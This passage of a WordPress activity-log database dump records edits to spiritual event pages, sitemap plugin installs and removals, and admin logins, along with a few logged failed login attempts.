class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234699,39861,'post_prev_post_status','draft'),(234700,39861,'post_new_post_status','publish'),(234701,39861,'post_prev_post_date','2023-10-25 13:54:50'),(234702,39861,'post_new_post_date','2023-10-25 13:55:39'),(234703,39861,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(234704,39861,'post_new_post_date_gmt','2023-10-25 19:55:39'),(234705,39861,'post_prev_thumb_id','266160'),(234706,39861,'post_prev_thumb_title','bird-sky-1'),(234707,39861,'post_new_thumb_id','268151'),(234708,39861,'post_new_thumb_title','sunset-shell-2'),(234709,39861,'_message_key','post_updated'),(234710,39861,'_user_id','2'),(234711,39861,'_user_login','S8zhaBda'),(234712,39861,'_user_email','nada@zipnadanot.org'),(234713,39861,'_server_remote_addr','76.130.120.x'),(234714,39861,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269260'),(234715,39862,'post_id','269260'),(234716,39862,'post_type','mec-events'),(234717,39862,'post_title','Our Spiritual Wake-up Calls'),(234718,39862,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234422,39836,'_message_key','post_updated'),(234423,39836,'_user_id','2'),(234424,39836,'_user_login','S8zhaBda'),(234425,39836,'_user_email','nada@zipnadanot.org'),(234426,39836,'_server_remote_addr','76.130.120.x'),(234427,39836,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=68102&action=edit'),(234428,39837,'failed_username','admin'),(234429,39837,'server_http_user_agent','Mozilla/5.0'),(234430,39837,'_message_key','user_unknown_login_failed'),(234431,39837,'_server_remote_addr','66.55.65.x'),(234432,39838,'plugin','www-xml-sitemap-generator-org/www-xml-sitemap-generator-org.php'),(234433,39838,'plugin_name','XML Sitemap Generator for Google'),(234434,39838,'plugin_title','<a href=\"https://XmlSitemapGenerator.org\">XML Sitemap Generator for Google</a>'),(234435,39838,'plugin_description','HTML, RSS and Google XML Sitemap generator compatible with Google, Bing, Baidu, Yandex and more. <cite>By <a href=\"https://XmlSitemapGenerator.org\">XmlSitemapGenerator.org</a>.</cite>'),(234436,39838,'plugin_author','<a href=\"https://XmlSitemapGenerator.org\">XmlSitemapGenerator.org</a>'),(234437,39838,'plugin_version','2.0.7'),(234438,39838,'plugin_url','https://XmlSitemapGenerator.org'),(234439,39838,'_message_key','plugin_deleted'),(234440,39838,'_user_id','2'),(234441,39838,'_user_login','S8zhaBda'),(234442,39838,'_user_email','nada@zipnadanot.org'),(234443,39838,'_server_remote_addr','76.130.120.x'),(234444,39838,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(234445,39839,'plugin_slug','google-sitemap-generator'),(234446,39839,'plugin_name','XML Sitemap Generator for Google'),(234447,39839,'plugin_url','https://auctollo.com/'),(234448,39839,'plugin_version','4.1.13'),(234449,39839,'plugin_author','Auctollo'),(234450,39839,'plugin_requires_wp',''),(234451,39839,'plugin_requires_php',''),(234452,39839,'plugin_install_source','web'),(234453,39839,'plugin_description','This plugin improves SEO using sitemaps for best indexation by search engines like Google, Bing, Yahoo and others. <cite>By <a href=\"https://auctollo.com/\">Auctollo</a>.</cite>'),(234454,39839,'_message_key','plugin_installed'),(234455,39839,'_user_id','2'),(234456,39839,'_user_login','S8zhaBda'),(234457,39839,'_user_email','nada@zipnadanot.org'),(234458,39839,'_server_remote_addr','76.130.120.x'),(234459,39839,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugin-install.php?s=sitemap&tab=search&type=term'),(234460,39840,'plugin_name','XML Sitemap Generator for Google'),(234461,39840,'plugin_slug','google-sitemap-generator'),(234462,39840,'plugin_title','<a href=\"https://auctollo.com/\">XML Sitemap Generator for Google</a>'),(234463,39840,'plugin_description','This plugin improves SEO using sitemaps for best indexation by search engines like Google, Bing, Yahoo and others. <cite>By <a href=\"https://auctollo.com/\">Auctollo</a>.</cite>'),(234464,39840,'plugin_author','<a href=\"https://auctollo.com/\">Auctollo</a>'),(234465,39840,'plugin_version','4.1.13'),(234466,39840,'plugin_url','https://auctollo.com/'),(234467,39840,'_message_key','plugin_activated'),(234468,39840,'_user_id','2'),(234469,39840,'_user_login','S8zhaBda'),(234470,39840,'_user_email','nada@zipnadanot.org'),(234471,39840,'_server_remote_addr','76.130.120.x'),(234472,39840,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugin-install.php?s=sitemap&tab=search&type=term'),(234473,39841,'post_id','269256'),(234474,39841,'post_type','nf_sub'),(234475,39841,'post_title',''),(234476,39841,'_message_key','post_updated'),(234477,39841,'_server_remote_addr','212.102.44.x'),(234478,39841,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_Reminder_Week_5&utm_medium=email'),(234479,39842,'plugin_name','Sitemap by BestWebSoft'),(234480,39842,'plugin_slug','google-sitemap-plugin'),(234481,39842,'plugin_title','<a href=\"https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/\">Sitemap by BestWebSoft</a>'),(234482,39842,'plugin_description','Generate and add XML sitemap to WordPress website. Help search engines index your blog. <cite>By <a href=\"https://bestwebsoft.com/\">BestWebSoft</a>.</cite>'),(234483,39842,'plugin_author','<a href=\"https://bestwebsoft.com/\">BestWebSoft</a>'),(234484,39842,'plugin_version','3.2.9'),(234485,39842,'plugin_url','https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/'),(234486,39842,'_message_key','plugin_deactivated'),(234487,39842,'_user_id','2'),(234488,39842,'_user_login','S8zhaBda'),(234489,39842,'_user_email','nada@zipnadanot.org'),(234490,39842,'_server_remote_addr','76.130.120.x'),(234491,39842,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(234492,39843,'plugin_name','Sitemap by BestWebSoft'),(234493,39843,'plugin_slug','google-sitemap-plugin'),(234494,39843,'plugin_title','<a href=\"https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/\">Sitemap by BestWebSoft</a>'),(234495,39843,'plugin_description','Generate and add XML sitemap to WordPress website. Help search engines index your blog. <cite>By <a href=\"https://bestwebsoft.com/\">BestWebSoft</a>.</cite>'),(234496,39843,'plugin_author','<a href=\"https://bestwebsoft.com/\">BestWebSoft</a>'),(234497,39843,'plugin_version','3.2.9'),(234498,39843,'plugin_url','https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/'),(234499,39843,'_message_key','plugin_activated'),(234500,39843,'_user_id','2'),(234501,39843,'_user_login','S8zhaBda'),(234502,39843,'_user_email','nada@zipnadanot.org'),(234503,39843,'_server_remote_addr','76.130.120.x'),(234504,39843,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(234505,39844,'plugin_name','Sitemap by BestWebSoft'),(234506,39844,'plugin_slug','google-sitemap-plugin'),(234507,39844,'plugin_title','<a href=\"https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/\">Sitemap by BestWebSoft</a>'),(234508,39844,'plugin_description','Generate and add XML sitemap to WordPress website. Help search engines index your blog. <cite>By <a href=\"https://bestwebsoft.com/\">BestWebSoft</a>.</cite>'),(234509,39844,'plugin_author','<a href=\"https://bestwebsoft.com/\">BestWebSoft</a>'),(234510,39844,'plugin_version','3.2.9'),(234511,39844,'plugin_url','https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/'),(234512,39844,'_message_key','plugin_deactivated'),(234513,39844,'_user_id','2'),(234514,39844,'_user_login','S8zhaBda'),(234515,39844,'_user_email','nada@zipnadanot.org'),(234516,39844,'_server_remote_addr','76.130.120.x'),(234517,39844,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(234518,39845,'plugin','google-sitemap-plugin/google-sitemap-plugin.php'),(234519,39845,'plugin_name','Sitemap by BestWebSoft'),(234520,39845,'plugin_title','<a href=\"https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/\">Sitemap by BestWebSoft</a>'),(234521,39845,'plugin_description','Generate and add XML sitemap to WordPress website. Help search engines index your blog. <cite>By <a href=\"https://bestwebsoft.com/\">BestWebSoft</a>.</cite>'),(234522,39845,'plugin_author','<a href=\"https://bestwebsoft.com/\">BestWebSoft</a>'),(234523,39845,'plugin_version','3.2.9'),(234524,39845,'plugin_url','https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/'),(234525,39845,'_message_key','plugin_deleted'),(234526,39845,'_user_id','2'),(234527,39845,'_user_login','S8zhaBda'),(234528,39845,'_user_email','nada@zipnadanot.org'),(234529,39845,'_server_remote_addr','76.130.120.x'),(234530,39845,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(234531,39846,'failed_username','admin'),(234532,39846,'server_http_user_agent','Mozilla/5.0'),(234533,39846,'_message_key','user_unknown_login_failed'),(234534,39846,'_server_remote_addr','66.55.65.x'),(234535,39847,'plugin_slug','wp-staging'),(234536,39847,'plugin_name','WP STAGING - Backup Duplicator &amp; Migration'),(234537,39847,'plugin_title','<a href=\"https://wordpress.org/plugins/wp-staging\">WP STAGING - Backup Duplicator &amp; Migration</a>'),(234538,39847,'plugin_description','Backup Restore <cite>By <a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>.</cite>'),(234539,39847,'plugin_author','<a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>'),(234540,39847,'plugin_version','3.1.0'),(234541,39847,'plugin_url','https://wordpress.org/plugins/wp-staging'),(234542,39847,'plugin_prev_version','3.0.6'),(234543,39847,'_message_key','plugin_bulk_updated'),(234544,39847,'_user_id','2'),(234545,39847,'_user_login','S8zhaBda'),(234546,39847,'_user_email','nada@zipnadanot.org'),(234547,39847,'_server_remote_addr','76.130.120.x'),(234548,39847,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(234549,39848,'_user_id','2'),(234550,39848,'_user_login','S8zhaBda'),(234551,39848,'_user_email','nada@zipnadanot.org'),(234552,39848,'_message_key','user_logged_out'),(234553,39848,'_server_remote_addr','76.130.120.x'),(234554,39848,'_server_http_referer','https://eckankar-colorado.org/wp-admin/index.php'),(234555,39849,'post_id','269258'),(234556,39849,'post_type','nf_sub'),(234557,39849,'post_title',''),(234558,39849,'_message_key','post_updated'),(234559,39849,'_server_remote_addr','212.102.44.x'),(234560,39849,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_Reminder_Week_5&utm_medium=email'),(234561,39850,'user_id','2'),(234562,39850,'user_email','nada@zipnadanot.org'),(234563,39850,'user_login','S8zhaBda'),(234564,39850,'_user_id','2'),(234565,39850,'_user_login','S8zhaBda'),(234566,39850,'_user_email','nada@zipnadanot.org'),(234567,39850,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(234568,39850,'_message_key','user_logged_in'),(234569,39850,'_server_remote_addr','76.130.120.x'),(234570,39850,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(234571,39851,'post_id','269259'),(234572,39851,'post_type','mec-events'),(234573,39851,'post_title','SOUND OF SOUL ONLINE TEMPLATE-CONTAINS REGISTRATION | Benefit Title Goes Here'),(234574,39851,'_message_key','post_updated'),(234575,39851,'_user_id','2'),(234576,39851,'_user_login','S8zhaBda'),(234577,39851,'_user_email','nada@zipnadanot.org'),(234578,39851,'_server_remote_addr','76.130.120.x'),(234579,39851,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(234580,39852,'new_post_title','SOUND OF SOUL ONLINE TEMPLATE-CONTAINS REGISTRATION | Benefit Title Goes Here'),(234581,39852,'new_post_id','269259'),(234582,39852,'duplicated_post_title','SOUND OF SOUL ONLINE TEMPLATE-CONTAINS REGISTRATION | Benefit Title Goes Here'),(234583,39852,'duplicated_post_id','266545'),(234584,39852,'_message_key','post_duplicated'),(234585,39852,'_user_id','2'),(234586,39852,'_user_login','S8zhaBda'),(234587,39852,'_user_email','nada@zipnadanot.org'),(234588,39852,'_server_remote_addr','76.130.120.x'),(234589,39852,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(234590,39853,'post_id','269259'),(234591,39853,'post_type','mec-events'),(234592,39853,'post_title','Tune In to the God Force'),(234593,39853,'post_new_thumb_id','266472'),(234594,39853,'post_new_thumb_title','misty-path-1'),(234595,39853,'post_meta_added','78'),(234596,39853,'_message_key','post_updated'),(234597,39853,'_user_id','2'),(234598,39853,'_user_login','S8zhaBda'),(234599,39853,'_user_email','nada@zipnadanot.org'),(234600,39853,'_server_remote_addr','76.130.120.x'),(234601,39853,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269259'),(234602,39854,'post_id','269259'),(234603,39854,'post_type','mec-events'),(234604,39854,'post_title','Tune In to the God Force'),(234605,39854,'post_new_thumb_id','266472'),(234606,39854,'post_new_thumb_title','misty-path-1'),(234607,39854,'post_meta_added','78'),(234608,39854,'_message_key','post_updated'),(234609,39854,'_user_id','2'),(234610,39854,'_user_login','S8zhaBda'),(234719,39862,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234724,39862,'_server_remote_addr','76.130.120.x'),(234720,39862,'_message_key','post_updated'),(234721,39862,'_user_id','2'),(234722,39862,'_user_login','S8zhaBda'),(234723,39862,'_user_email','nada@zipnadanot.org'),(234726,39863,'post_id','269260'),(234727,39863,'post_type','mec-events'),(234728,39863,'post_title','Our Spiritual Wake-up Calls'),(234729,39863,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234725,39862,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269260&action=edit'),(234730,39863,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234731,39863,'_message_key','post_updated'),(234732,39863,'_user_id','2'),(234733,39863,'_user_login','S8zhaBda'),(234734,39863,'_user_email','nada@zipnadanot.org'),(234735,39863,'_server_remote_addr','76.130.120.x'),(234736,39863,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269260&action=edit'),(234737,39864,'post_id','269260'),(234738,39864,'post_type','mec-events'),(234739,39864,'post_title','Our Spiritual Wake-up Calls'),(234740,39864,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234741,39864,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 